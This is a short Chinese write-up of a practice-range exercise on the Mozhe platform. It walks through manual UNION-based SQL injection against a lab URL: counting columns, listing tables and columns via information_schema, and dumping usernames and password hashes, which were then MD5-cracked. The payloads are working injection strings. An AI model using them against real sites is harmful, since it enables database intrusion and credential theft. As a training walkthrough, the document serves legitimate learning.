背景:
自己在墨者官网靶场练习的时候,一直出错,手工容易出错,所以列举一些信息供大家核对,可以参考改动。
bash
数据库版本version() 5.7.22-0ubuntu0.16.04.1
当前数据库名称database() mozhe_Discuz_StormGroup
当前数据库用户user() root@localhost
操作系统@@version_compile_os Linux
信息:
一、猜列
bash
124.70.22.208:45582/new_list.php?id=-1 order by $number
结果:1,2,3,4,只显示2,3
二、inmation_schema查表:
bash
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
查询结果:StormGroup_member,notice
三、①StormGroup_member表中的列:
bash
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
查询结果:id,name,password,status
四、②notice表中的列:
bash
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice'
查询结果:id,title,content,time
分析:显然StormGroup_member表中的列更符合预期,查其中的数据
五、查name,password:
bash
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member
查询结果,有两个name和对应的password。
总结:
md5解密后只有一个name可以使用。手工注入较为繁琐,但能锻炼对漏洞的理解,读者们发现问题可私信交流。